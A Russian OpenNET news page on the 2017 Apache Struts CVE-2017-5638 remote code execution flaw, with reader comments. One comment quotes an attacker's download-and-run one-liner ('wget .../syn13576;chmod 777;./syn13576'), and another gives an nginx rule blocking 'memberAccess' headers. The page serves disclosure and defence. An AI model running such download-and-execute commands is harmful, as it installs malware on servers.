The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

09.03.2017 11:04  Волна взломов сайтов через неисправленную уязвимость в Apache Struts

Опубликовано экстренное обновление web-фреймворка Apache Struts (2.3.32 и 2.5.10.1), применяемого для создания web-приложений на языке Java с использованием парадигмы Model-View-Controller. В новых выпусках устранена критическая 0-day уязвимость (CVE-2017-5638), которая уже несколько дней используется злоумышленниками для получения контроля за сайтами, работающими под управлением Apache Struts.

Уязвимость позволяет выполнить произвольный код на сервере, отправив запрос со специально оформленным содержимым HTTP-заголовка "Content-Type". Проблема проявляется в выпусках Struts с 2.3.5 по 2.3.31 и с 2.5.0 по 2.5.10, и вызвана ошибкой в коде Multipart parser, применяемом для разбора запросов, состоящих из нескольких частей (multipart/form-data). В случае, если заголовок Content-Type содержит некорректное значение, срабатывает исключение для отображения сообщения об ошибке, которое, если в тексте присутствует маска "multipart/form-data", также приводит к вызову обработчика Multipart parser и выполнению произвольного кода, передаваемого через выражение OGNL.

Так как в открытом доступе опубликовано несколько вариантов рабочих эксплоитов и в сети уже зафиксирована автоматизированная вредоносная активность, эксплуатирующая данную уязвимость, всем пользователям Apache Struts рекомендуется в экстренном порядке выполнить обновление или блокировать работу компонента Jakarta Multipart parser, а также убедиться в отсутствии следов атаки на систему. Обновления пакетов с libstruts уже выпущено для Debian. В Ubuntu проблема остаётся неисправленной. В штатных репозиториях RHEL/Cent OS пакет Apache Struts не поставляется.

В случае если web-приложение выполняется в контейнере Apache Tomcat, запускаемом с правами root, в результате атаки сразу может быть получен root-доступ к системе. Например, фиксируемые в логах попытки атак выполняют отключение пакетного фильтра и устанавливают бэкдор для удалённого управления системой или типовое вредоносное ПО:



  1. Главная ссылка к новости (http://blog.talosintelligence....)
  2. OpenNews: Опасная уязвимость в Apache Tomcat
  3. OpenNews: Уязвимость в устаревших выпусках Apache Tomcat, которая может привести к выполнению кода на сервере
  4. OpenNews: Зафиксирован самораспространяющийся червь, поражающий серверы Apache Tomcat
  5. OpenNews: В Apache Struts 2.0.12 исправлены две серьезные уязвимости
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: apache, struts
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, Аноним, 11:47, 09/03/2017 [ответить] [смотреть все]
  • +1 +/
    Стратс уже сто лет в полусдохшем состоянии и никому не нужен.
     
     
  • 2.3, Аанон, 11:49, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]
  • +19 +/
    Никому, кроме всех тех, кому он нужен.
     
  • 1.4, Аноним, 11:56, 09/03/2017 [ответить] [смотреть все]
  • +8 +/
    С учётом того, что сайты на Java+Struts очень любят делать банки и госучреждения (умолчим про gosuslugi.ru) последствия этой дыры могут быть даже серьёзнее, чем кажется.
     
     
  • 2.37, лютый жабист__, 05:43, 10/03/2017 [^] [ответить] [смотреть все] [показать ветку]
  • +/
    Если госуслуги на струтсе сделаны и можно было тихой сапой слить базу ПФР ИНН ФИ... весь текст скрыт [показать] [показать ветку]
     
  • 1.5, Аноним, 12:11, 09/03/2017 [ответить] [смотреть все]  
  • +7 +/
    Если у вас томкат за нжинксом, можете быстро сделать:

    if ($http_content_type ~ memberAccess) {
        return 403;
    }

     
     
  • 2.29, Alex, 22:15, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –6 +/
    что за блин нжинкс, энжин-экс (engine x)
     
     
  • 3.36, incker, 03:29, 10/03/2017 [^] [ответить] [смотреть все]  
  • +/
    x - икс так оно читается на русском x - экс так оно читается на английском Так ... весь текст скрыт [показать]
     
  • 1.6, Michael Shigorin, 12:13, 09/03/2017 [ответить] [смотреть все]  
  • +/
    Интересно, успел ли кто эту беду сбэкпортировать в EOL'нутый 1.3.10, который по всем https://pkgs.org/download/struts ...
     
  • 1.12, iZEN, 13:26, 09/03/2017 [ответить] [смотреть все]  
  • +4 +/
    Судя по командам, эксплуатируемым эксплоитами, все они предназначены для управления дистрибутивами линуксов, но не FreeBSD.
     
     
  • 2.14, Аноним, 13:38, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +2 +/
    Что лишний раз подтверждает большую распространённость FreeBSD на серверах ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.22, Аноним, 15:43, 09/03/2017 [^] [ответить] [смотреть все]  
  • +13 +/
    > Что лишний раз подтверждает большую распространённость FreeBSD на серверах.

    Вот и гордые надуватели щёчек набежали.
    Может, все дело в том, что бздюки, в отличие от некоторых излишне пафосных лапчатых, слышали о нормальных дефолтах и у них есть такие замечательные штуки, как монтирование с nonexec?
    https://www.freebsd.org/cgi/man.cgi?mount(8)
    Так что
    [code]
    cd /tmp; wget .../syn13576;chmod 777 syn13576;./syn13576
    [/code]
    можно делать хоть до посинения.
    А еще, для апачей и прочих дыроколов есть такая вещь, как клетки. Это типа контейнера, только без той кучи дыр и оговорок, что "контейнеры вообще-то не для безопасности!".
    Так что обтек… завидуйте молча.

     
     
  • 4.24, Sw00p aka Jerom, 16:13, 09/03/2017 [^] [ответить] [смотреть все]  
  • +8 +/
    В клетках практически всё под ro, а для нужд ПО рабочую директорию под nonexec,nosymfollow и тд, не говоря уже об урезанном мире самой клетки.
     
  • 4.31, Аноним, 23:25, 09/03/2017 [^] [ответить] [смотреть все]  
  • –2 +/
    А в линуксе конечно же не монтирования с noexec. Пиши есчо, непафосный ты наш.
     
     
  • 5.53, Аноним, 15:08, 10/03/2017 [^] [ответить] [смотреть все]  
  • +5 +/
    Судя по эксплойту, нет Или как с тем же grsecurity, все есть, но никто не польз... весь текст скрыт [показать]
     
  • 4.35, Аноним, 02:09, 10/03/2017 [^] [ответить] [смотреть все]  
  • –2 +/
    VNET уже перестал ядро ронять, м? Или всё по старинке - на алиасах костыляете?
     
     
  • 5.56, Аноним, 15:27, 10/03/2017 [^] [ответить] [смотреть все]  
  • +2 +/
    Если отвлечся от откровенного спрыгивания с темы, все равно остается вопрос и к... весь текст скрыт [показать]
     
  • 4.40, Аноним, 08:30, 10/03/2017 [^] [ответить] [смотреть все]  
  • –4 +/
    Представляешь в моём дистрибутиве не только с noexec монтируется всё левое, но е... весь текст скрыт [показать]
     
     
  • 5.52, Аноним, 15:02, 10/03/2017 [^] [ответить] [смотреть все]  
  • +3 +/
    nodev Зачем он нужен Хотя чего это я, до лапчтатых ведь иногда как до жирафов ... весь текст скрыт [показать]
     
     
  • 6.55, Аноним, 15:22, 10/03/2017 [^] [ответить] [смотреть все]  
  • –3 +/
    Прелестно, вот такие вот специалисты бздю и лепят ... весь текст скрыт [показать]
     
     
  • 7.57, Аноним, 15:39, 10/03/2017 [^] [ответить] [смотреть все]  
  • +3 +/
    Вот такие как вы специалисты не знают, но имеют ценное мнение оюо всем на свет... весь текст скрыт [показать]
     
     
  • 8.61, Аноним, 18:03, 11/03/2017 [^] [ответить] [смотреть все]  
  • –2 +/
    Ну то есть зачем нужен nodev вы по прежнему не знаете ?
     
     
  • 9.62, Аноним, 19:01, 11/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    Опять по себе судите Разрешаю посмотреть в ман https linux die net man 8 mo... весь текст скрыт [показать]
     
  • 4.48, Michael Shigorin, 12:18, 10/03/2017 [^] [ответить] [смотреть все]  
  • +2 +/
    Только не говорите мне, что такие очепятки врастают в пальцы тех, кто на самом д... весь текст скрыт [показать]
     
     
  • 5.54, Аноним, 15:21, 10/03/2017 [^] [ответить] [смотреть все]  
  • +2 +/
    Хорошо, не скажу Еще не скажу ничего о fstab Потому как, если уж кому-то хочет... весь текст скрыт [показать]
     
     
  • 6.58, Michael Shigorin, 17:17, 10/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    Туда пишут или скрипты, или те, кто буковки умеет нажимать правильно Дружески п... весь текст скрыт [показать]
     
  • 4.67, пох, 16:06, 17/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    о нормальных они сроду не слышали - начиная от попыток автоматического сетапа в ... весь текст скрыт [показать]
     
  • 2.16, Аноним, 14:17, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +6 +/
    Но ведь на жаве, это главное, разве нет?
     
  • 2.64, Некулхацкер, 18:16, 14/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Они для случаев, когда среду разворачивали как попало Не скажу, что это редкое ... весь текст скрыт [показать] [показать ветку]
     
  • 2.66, Некулхацкер, 18:46, 16/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Оригинальный взгляд на проблему Очень Что помешает запустить под фрёй контейне... весь текст скрыт [показать] [показать ветку]
     
  • 1.17, Аноним, 15:03, 09/03/2017 [ответить] [смотреть все]  
  • +/
    Сбер напрягся.
     
     
  • 2.23, Анон2, 16:09, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Сбер в пятницу чуть у матери 27к кому-то не перевел Но в сбере всем как бы ложи... весь текст скрыт [показать] [показать ветку]
     
  • 2.25, Аноним, 17:47, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    У Сбера блокчейн, не трогайте его.
     
     
  • 3.26, Гостище, 18:22, 09/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    У кого-то в сбере блокчейн В академических целях, не коммерческих У остальных ... весь текст скрыт [показать]
     
  • 1.30, Аноним, 22:30, 09/03/2017 [ответить] [смотреть все]  
  • +1 +/
    Java же безопасный язык, это не C! Как такое возможно?
     
     
  • 2.39, Геймер, 08:06, 10/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Дыра во фреймворке, виновата Java. Логичный Вы наш!
     
     
  • 3.42, Аноним, 10:41, 10/03/2017 [^] [ответить] [смотреть все]  
  • +/
    А что, Oracle уже совсем Java от блобов избавил?
     
     
  • 4.43, Геймер, 11:00, 10/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    А что, новость уже не читаем?
     
  • 4.49, J.L., 12:46, 10/03/2017 [^] [ответить] [смотреть все]  
  • +/
    у вас сильно не актуальные сведения http stackoverflow com questions 25936712 ... весь текст скрыт [показать]
     
  • 4.50, Michael Shigorin, 13:01, 10/03/2017 [^] [ответить] [смотреть все]  
  • +/
    > А что, Oracle уже совсем Java от блобов избавил?

    Скорее от разработчиков...

     
  • 3.44, Аноним, 11:12, 10/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    Java - виртуальная машина Следовательно дырка в Java, если можно исполнить код ... весь текст скрыт [показать]
     
     
  • 4.45, Аанон, 11:38, 10/03/2017 [^] [ответить] [смотреть все]  
  • +2 +/
    ШОК Обнаружена критическая уязвимость в java lang Runtime Существующий в нем... весь текст скрыт [показать]
     
     
  • 5.46, Аноним, 11:47, 10/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    Оно в отдельном потоке в java машине всё-равно выполняется ... весь текст скрыт [показать]
     
     
  • 6.47, Аанон, 12:08, 10/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Тогда и оригинальная уязвимость - это вовсе не уязвимость, т к в отдельном по... весь текст скрыт [показать]
     
  • 4.59, iZEN, 23:03, 10/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    Это всё С На нём написали JVM ... весь текст скрыт [показать]
     
  • 1.32, Аноним, 23:25, 09/03/2017 [ответить] [смотреть все]  
  • –1 +/
    Никогда не мог понять сакральный смысл трех семёрок Вот почему не chmod 11... весь текст скрыт [показать]
     
     
  • 2.33, tonys, 23:31, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Потому что 7 это 1+2+4
     
  • 2.34, Аноним, 00:41, 10/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +2 +/
    Ну ты чего уж. Три семерки. А везде, по всему Союзу три семерки, понимаешь?
     
  • 2.38, Аноним, 05:51, 10/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    Сакральный смысл 8211 в портвейне Три семёрки , он же Три топора Видимо, ... весь текст скрыт [показать] [показать ветку]
     
  • 2.41, Аноним, 08:36, 10/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    > Никогда не мог понять сакральный смысл трех семёрок.

    Во имя Сатаны же, ну.

     
  • 2.51, виндотролль, 14:02, 10/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    иди потаскай окошки по экрану
     
  • 2.68, пох, 16:12, 17/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    так проще, и оно работает - в отличие от твоих поделок первое ломает скритовые я... весь текст скрыт [показать] [показать ветку]
     
  • 1.60, Аноним, 00:28, 11/03/2017 [ответить] [смотреть все]  
  • +/
    Веб-приложения с правами рута Совсем поехавшие ... весь текст скрыт [показать]
     
     
  • 2.65, Некулхацкер, 18:19, 14/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Ну ведь под рутом проще ... весь текст скрыт [показать] [показать ветку]
     
  • 1.63, Некулхацкер, 18:11, 14/03/2017 [ответить] [смотреть все]  
  • –2 +/
    Не очень понимаю, что может дать возможность выполнить некий код с правами запустившего контейнер. Чаще всего контейнер запускают от пользователя, для которого и командного интерпретатора нет. Если же контейнер запускают из под root-а -- ну такое ничем не лечится.
     
     
  • 2.69, пох, 16:17, 17/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    которого зовут root почитайте внимательно, через какую задницу предлагается зап... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.70, Кэп, 16:02, 19/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Э, как-бы, Томкэт запустить не от рута нет никакой проблемы Вообще Тем более Г... весь текст скрыт [показать]
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor